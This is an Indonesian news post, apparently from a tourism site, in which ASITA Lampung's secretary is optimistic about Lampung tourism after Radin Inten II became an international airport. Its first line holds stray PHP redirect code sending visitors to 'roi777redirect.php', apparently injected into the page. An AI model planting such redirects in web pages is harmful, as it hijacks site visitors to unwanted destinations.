header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); 2017 ASITA Lampung Optimis Pariwisata Lampung Maju -
2017 ASITA Lampung Optimis Pariwisata Lampung Maju

Kondisi pariwisata lampung 2017 pasca diluncurkanya bandara radin inten II menjadi bandara internasional cukup menjanjikan bagi perkembangan pariwisata lampung. Bagaimana tidak selama ini wisatawan yang akan ke lampung harus transit dulu ke Jakarta untuk menuju ke Lampung namun setelah bandara jadi dipastikan wisatawan akan berbondong bondong mengunjungi lampung.

Selain budaya lampung yang cukup baik destinasi wisatanya cukup potensial untuk dikunjungi tinggal penatataanya saja dan kesiapaan masyarakat Lampung yang perlu lebih dipersiapkan. Saya sangat optimis lampung akan menjadi destinasi wisata favorit diindonesia.

Sungguh kabar yang baik bagi masyarakat pariwisata apabila Lampung secara kontinyu dikunjungi wisatawan karena semua akan menikmati perkembangan pariwisata. Baik pemerintah dengan akan tumbuhnya perkembangan ekonomi kemasyarakatan dengan wisatawan membelanjakan uangnya disini. Masyarakat pariwisata menikmati kunjungan wisatawan dengan berdagang baik souvenir,kuliner dan pakaian khas lampung sementara biro perjalanan menikamati hasil kunjungan wisatawan dengan mendapatkan paket paket wisata yang dijual. Sungguh pariwisata menguntungkan semua pihak termasuk industri perhotelan dengan tamu yang akan menginap dihotel baik hotel bintang maupun non bintang. Majunya pariwisata Lampung akan berdampak positif bagi UKM di lampung juga akan menginspirasi bagi pelaku pelaku wisata untuk mencari ide ide yang cukup briliant.

Ada 3 hal yang memungkinkan wisatawan akan mengunjungi Lampung 1.something to see.(wisatawan berkunjung mau melihat apa kelampung?) 2.something to do (wisatawan akan melakukan apa saat ada di Lampung) 3.something to buy (wisatawan mau belanja apa atau mau beli oleh oleh apa saat di Lampung). Pertanyaannya apakah ketiga unsur teraebut sudah dimilki lampung?

Jawabanya ada pada kita semua apakah kita mampu berbuat untuk lampung dan apakah kita sudah siap menyambut wisatawan dengan diluncurkanya bandara radin inten menjadi bandara internasional dan apakah kita akan menjadi pelaku wisata atau kah kita hanya bisa comentar dan menjadi penonton yang baik? Jawabnya ada di kita semua yaitu pemerintah,pelaku wisata,masyarakat pariwisata dan kita semua yang ingin terlibat pariwisata akan maju dan berkembamg semoga pariwisata lampung terus maju. (Adi Susanto (Sekertaris Asita Lampung)

News Reporter

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.